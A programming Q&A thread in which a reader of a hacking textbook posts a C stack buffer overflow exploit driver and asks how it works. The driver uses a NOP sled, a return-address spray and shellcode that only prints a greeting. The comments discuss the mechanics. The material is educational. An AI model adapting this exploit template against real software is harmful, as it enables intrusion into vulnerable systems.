# Need help in understanding this exploit using the stack

Tags: c, exploit, shellcode

I am recently reading *Hacking: the art of exploitation*. But I stuck in this piece of code.

```
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";

int main(int argc, char **argv) {
    unsigned int i, *ptr, ret, offset = 377;
    char *command, *buffer;
    command = (char *)malloc(200);
    memset(command, 0, 200);

    strcpy(command, "./overflow_shellcode \'");
    buffer = command + strlen(command);

    if (argc > 1)
        offset = atoi(argv[1]);

    ret = (unsigned int)&i - offset;

    for (i = 0; i < 160; i += 4)
        *((unsigned int *)(buffer + i)) = ret;
    memset(buffer, 0x90, 60);
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
    strcat(command, "\'");

    system(command);
    free(command);

    return 0;
}
```

I don't understand that shellcode is on the heap, `ret` is for over-writing the return address. But `i` is on stack, so `rip` will point to the return address, and won't point to the heap. Am I right? But my test tell me that, the shellcode is executed. But why?

Comment: So the book doesn't explain how the code it includes works? Hope it wasn't expensive.

Comment: You also need to share the code of `overflow_shellcode`. This just seems to be the driver.

Comment: As far as I can see, there does not seem to be any undefined behavior within the code that show. As such, all the wizardry that you see here is just to set up the correct input for `./overflow_shellcode` to exploit *that*. The placement of the shell code within the current process is irrelevant.

Comment: @cmaster No Undefined Behavior? `(unsigned int)&i - offset` ?

Comment: @AjayBrahmakshatriya Oh, yes, overlooked that. Nevertheless, it's nothing that can make anything bad happen on any modern CPU. (It's UB because some CPUs may trip on invalid pointer arithmetic, but that's not the case if a pointer is just a 64 bit unsigned integer to the CPU.)